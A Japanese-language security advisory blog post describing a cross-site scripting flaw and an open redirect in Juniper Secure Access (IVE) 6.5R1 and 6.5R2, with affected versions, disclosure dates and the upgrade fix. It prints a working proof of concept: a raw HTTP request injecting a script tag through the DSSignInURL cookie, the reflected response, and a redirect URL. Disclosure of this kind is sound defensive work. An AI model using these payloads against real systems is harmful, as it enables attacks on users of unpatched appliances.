金曜日, 6月 11, 2010

Juniper Secure Access(Juniper IVE)のXSSとREDIRECTIONセキュリティ問題

Juniper Secure Accessシリーズ(Juniper Networks IVE)はJuniperセキュリティアプライアンスが使ってるウエプGUIインターフェースです。Juniper Networks IVEが使っているアプライアンスの写真は下記となります↓


問題の説明↓
XSS(クロススクリプティング)とウェブアクセスREDIRECTIONセキュリティ問題が発見されて、リモート側からxssインジェクション攻撃をされる問題起きる可能性が高いです。

下記のバージョンに影響があります↓
Juniper Networks
version 6.5R1 (Build 14599)
version 6.5R2 (Build 14951)

注意点↓
つい最近本件セキュリティ問題情報がインターネットでパブリックで交換されてます。再現仕方(PoC)迄に詳しく書いてありますがアップグレードが直ぐに必要です。

再現仕方(PoC)↓
1) 「GET cookie XSS インジェックション」の再現仕方
GET /dana/nc/ncrun.cgi?launch_nc=1 HTTP/1.1
Host: 10.0.5.23
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://10.0.5.23/dana/home/index.cgi
Cookie: DSPREAUTH=; DSFirstAccess=1255332662; DSHCSTARTED=x;
DSASSERTREF=x; DSLastAccess=1255332662; lastRealm=Users;
DSSignInURL=/e6cf2"><script>alert(1)</script>81d17f3a375;
DSSIGNIN=url_default; DSOSMLOGIN=x; DSIVS=; DSCheckBrowser=x;
DSID=5beee6a236f28b2c3ccf14d56b34feba; DSLaunchURL=x;
DSBrowserProxy=127.0.0.1%3A8080;

RESULTS (PART OF)
<PARAM NAME="AutoStart" VALUE="false"><param name="locale" value="en">
<param name="upgradeMode" value="">
<param name="Parameter0"
value="cert_md5=8ae8f59ab11a2e6f43b383876d270799;dns-suffix=procheckup.c
om;switch-dns-search-order=disabled;internal-proxy-config=no;ncp_read_ti
meout=90;enable_logging=0;enable_logupload=0;win_start_script=;win_end_s
cript=;win_skip_start_script=0;linux_start_script=;linux_end_script=;mac
_start_script=;mac_end_script=;signin_url=/e6cf2"><script>alert(1)</script>81d17f3a375;fips_mode=0">
<param name="Parameter1" value="split-tunneling-routes=">
<param name="Parameter2" value="split-tunneling-mode=1">
<param name="Parameter3" value="nc_auto_uninstall_mode=0">

2) REDIRECTIONセキュリティ問題の再現仕方↓
https://target-domain.foo/dana/home/homepage.cgi?syncFlag=1&name=test&ur
l=555-555-0199 (at) example (dot) com [email concealed]&chkFavorite=on&chkNewWindow=on&chkAddressBar=
on&Location=http://www.procheckup.com&chkToolbar=on&cancel=Cancel

解決方法↓
IVEバーション6.5R3.1 (build 15255)以上へアップグレードが必要です。

リファレンス↓

追加情報↓
発見日: 12th October 2009
メーカに報告: 12 October 2009
メーカより正式な報告: 2010年6月10日
CVE登録:N/A
Severity: Medium (Script injection)


---
zeroday.jp(0day.jp)
セキュリティチーム

0 件のコメント:

コメントを投稿